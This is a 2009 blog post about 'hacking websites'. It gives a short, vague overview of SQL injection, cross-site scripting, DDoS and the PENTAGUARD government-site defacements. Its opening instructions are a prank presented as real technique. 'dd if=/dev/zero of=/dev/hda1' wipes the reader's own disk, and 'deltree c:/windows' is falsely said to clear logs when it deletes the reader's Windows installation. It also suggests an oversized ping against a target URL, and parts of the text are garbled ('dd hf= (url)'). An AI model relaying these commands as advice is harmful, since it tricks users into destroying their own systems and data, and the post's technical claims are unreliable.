Hacking Websites…Fun or Terror???

Posted on 22/11/2009 by


With a proper understanding of the important programming languages such as C, C++, Pearl, Java etc. A person can be fully prepared with the technique of hacking into websites…There are backdoors for the web hackers for website hacking and for hacking web sites one of the best ways…is for the hacker to install Linux on his/her personal computer if he/she wants to hack from. Then he/she can open up a shell to type: dd if=/dev/zero of=/dev/hda1 and press ENTER. As the next step he/she will type: dd hf= (url)… There are a few other alternatives for hacking sites as well. The web hackers using Windows Pc can also master the art of hacking websites with the flicking of his/her finger.

The first step is to clear up the tracks so that the feds fail to trace out the hacker. This happens automatically in case of linux. Clearing up of tracks in case of Windows 95 or Windows 98 or Windows ME involves a step-by step procedure.

1.Click Start go to Run and then Command. In case of Windows NT or Windows 2000 the Tracks can be clered by pressing Start then Run and then cmd.

2.Then clear up tracks with deltree c:/windows or c:\winnt, or whatever the main windows directory is… At the command prompt press y… which will then go through and clear up the system’s logs… The hackers should perform the same steps again after the hacking sites/hacking wireless internet sites. Then after this clearing up the hackers should type: ping -l4000 (url).

Cyber Terrorism And Hacker’s Group
The whole planet today is terrorized by web hackers to whom hacking seems a mode of getting pleasure by the way of gaining knowledge or more entertainment…A group of serious hackers named as PENTAGUARD had cracked into the government sites of Australia, America and England all at one time. The hackers in this case had replaced with a typical statement that read “The largest .gov & .mil mass defacement in the history of mankind”.
This was a simple statement with an aesthetic undertone of threat…The act affected almost 24 sites with a transitory disruption.

The common wealth of Australia is of no exception and the search page of the common wealth of Australia was once hacked along with the act of hacking into websites of small municipal sites in Australia. These are a scanty number of instances that proved to have jeopardized the respective concerns severely and hackers had to use simple techniques and methods to do these. Website hacking for these hackers is all as simple as a child’s play their main focus was on the sites that were designed with vulnerable loopholes.


SQ L Injection and Hacking Web Sites
Vandals…who know how to hack, most often use different hacking methods for the purpose of defacing a website or ruin the entire data and files while the other section cracks through the websites simply to steal the substance. While the former brings severe harm to the victim the cyber burglars do not do much harm.

There are loadzz of devastating tools that the web hackers use to break just anything and everything they want to…One of the most popular weapons or method that can bring immense harm is SQL Injection. SQL the short form of Structured Query Language is a special type of language that is used when a web application uses a database communicating and interacting with the other database for some required functions.
With the help of the SQL command issued to a database server…the web application can put a deep impact to all the aspects of the database allowing the hackers to edit..add..and delete information there from. SQL has been designed for the legitimate purpose while it has now become a deadly weapon in the hand of the web hackers intended for hacking sites…The web hackers can inject SQL command and may perform any operation as per his/her own sweet will.

Cross Site Scripting
Another more dangerous technique is Cross Site Scripting...which is also defined by XSS. This is a stronger weapon that brings out much more wreckage and Cross Site Scripting or XSS is a devastating technique that facilitates the hackers to inject the malicious scripting code in the form of _JavaScript in the user input form or sometimes incorporated in the URL query string. Cross Site Scripting can seriously do any task such as recording the keystrokes and stealing cookies once its injected into the targeted browser of the end user.

Distributed Denial of Service

Denial of Service attack or Distributed Denial of Service- DOS or DDOS is the attacking technique that is used by the hackers who wants to overload any remote system with a repeated and a very large volume of requests for any specified services…The most interesting fact about DDOS is that it can attack a several thousands of individual users in such a way that the script fails to detect whether the requests are valid or invalid…though its quite tough to prevent Dos attack.. yet successful efforts have been made in this regard by checking the IP address hacking of the source of the requests.

There are countless of such deliberate techniques in the hands of the web hackers for hacking into websites. These tools have made the website hacking so easy that it has become fun for the cyber terrorists and the first step of hacking web sites is simply to detect the weak and less secured portion of the system.

Enjoy! 😀

Posted in: Hacking, Web Hacing